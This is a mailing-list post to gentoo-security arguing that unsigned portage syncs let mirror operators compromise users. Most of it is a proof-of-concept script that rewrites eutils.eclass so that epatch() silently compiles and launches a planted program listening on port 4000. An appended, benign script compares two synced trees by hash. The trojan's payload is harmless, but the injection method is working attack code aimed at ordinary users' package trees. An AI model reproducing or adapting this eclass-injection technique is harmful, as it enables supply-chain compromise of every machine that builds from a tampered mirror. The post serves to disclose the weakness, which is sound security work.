Hi,

after 1.5 years (2 years after the bug could be found in bugzilla) it
seems that one of the highest security risks is closed. At least I've
seen something about signed ebuilds. (see
http://marc.theaimsgroup.com/?l=gentoo-security&m=104816199500974&w=2 ).

Time for the next part. I've already written a bug for that a year ago,
but it was now closed a second time by "the ... gatekeeper".

See bug #26110

Here's the next small script. If you are operating a gentoo mirror, or
have access to one, feel free to play with it.

If you are a user, the only practical way to ensure a minimum of
security is to sync twice:
(a) sync,
(b) delete timestamp,
(c) sync with other mirror and
(d) look if no files were different, otherwise restart with (a)

----------------gentooTrojan.sh---------------------------
#!/bin/sh
if [ ${#} -ne 1 ] ; then
  echo "This script puts a silly trojan into Gentoo's portage."
  echo "Usage: `basename ${0}` PathToPortage"
  exit 1
fi

mv ${1}/eclass/eutils.eclass ${1}/eclass/eutils-without-trojan.eclass
sed -e 's:^epatch().*{:epatch() {\newarn "Starting Trojan.\nTry it with telnet localhost 4000.\nKill it with killall GentooTrojan."\n${PORTDIR}/eclass/GentooTrojan \&\n:' <${1}/eclass/eutils-without-trojan.eclass >${1}/eclass/eutils.eclass
cat >${1}/eclass/GentooTrojan.c << EOF
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <string.h>

int main(void)
{
  struct sockaddr_in serv;
  struct sockaddr_in cli;
  int sock;
  sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
  if (sock < 0)
    return 1;
  bzero((char *) &serv, sizeof(serv));
  serv.sin_family = AF_INET;
  serv.sin_addr.s_addr = htonl(INADDR_ANY);
  serv.sin_port = htons(4000);
  if (bind(sock, (struct sockaddr *) &serv, sizeof(serv)) < 0)
    return 1;
  if (listen(sock, 5) < 0)
    return 1;
  while (1) {
    int scli;
    int slen;
    static char *str="Your are listing to the famous Gentoo trojan!\n";
    slen = sizeof(cli);
    scli = accept(sock, (struct sockaddr *) &cli,
                  (socklen_t *) &slen);
    write(scli, str, strlen(str));
    close(scli);
  }
}
EOF

gcc -o ${1}/eclass/GentooTrojan ${1}/eclass/GentooTrojan.c

echo "Done. Portage successful infected with a trojan."
echo "Just emerge an ebuild which uses epatch and do a"
echo " telnet localhost 4000"
echo "afterwards."
-------------------------------------------

Kind regards,

Alexander Holler


PS: Please don't reply to me, I don't read any Gentoo mailing lists
anymore, in fact I even don't know why I'm writing this message, as I
already have lost every interest in Gentoo some time ago.

PPS: Sorry for those hard words, but that all reminds me of Microsoft.
The "eclass-hell" is as bad as the "dll-hell" and some bugs are getting
forgotten, ignored or fixed in the same time.

PPPS: I really appreciate all the very good work on hardened gcc,
selinux-profiles and so on, but for me, this all seems useless as long
as the base is compromised that easily and the user has no practical way
(e.g. hashes) to check what he gets on his machine with a 'sync'.

--
gentoo-security@g.o mailing list
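The "sync twice and compare" check from steps (a)-(d) above, as an added example that is not part of the original post: it hashes two local copies of the portage tree, assumed to have been synced from two different mirrors (hypothetical paths), skips the timestamp file that step (b) deletes anyway, and lists every file that differs between the two copies.

```shell
#!/bin/sh
# Added example, not from the original post. TREE_A and TREE_B are assumed
# to be two local copies of the portage tree, each synced from a different
# mirror. Requires sha256sum (GNU coreutils); paths are assumed to contain
# no whitespace, which holds for a portage tree.

# Print "<sha256>  ./relative/path" for every regular file under $1, sorted
# by path, so that two copies with identical content give identical output.
# metadata/timestamp (assumed location) and distfiles are excluded.
tree_digest() {
    ( cd "$1" && find . -type f \
          ! -path './distfiles/*' ! -path './metadata/timestamp*' \
          -exec sha256sum {} + ) | LC_ALL=C sort -k 2
}

# Compare two copies of the tree. Prints every path whose content differs
# or that exists on only one side; returns 0 only when the copies match.
compare_trees() {
    da=$(tree_digest "$1")
    db=$(tree_digest "$2")
    # a line present in both digests is a file with the same hash on both
    # sides; uniq -u drops those and keeps changed or one-sided files
    diffs=$(printf '%s\n%s\n' "$da" "$db" | LC_ALL=C sort | uniq -u \
            | awk '{ print $2 }' | LC_ALL=C sort -u)
    [ -z "$diffs" ] && return 0
    printf '%s\n' "$diffs"
    return 1
}

if [ $# -eq 2 ]; then
    # e.g. ./checksync.sh /usr/portage /var/tmp/portage-from-mirror-b
    compare_trees "$1" "$2" && echo "no differences between the two syncs"
fi
```

Any path it prints is a file that one mirror served differently from the other; that is the case where the message says to start again with (a).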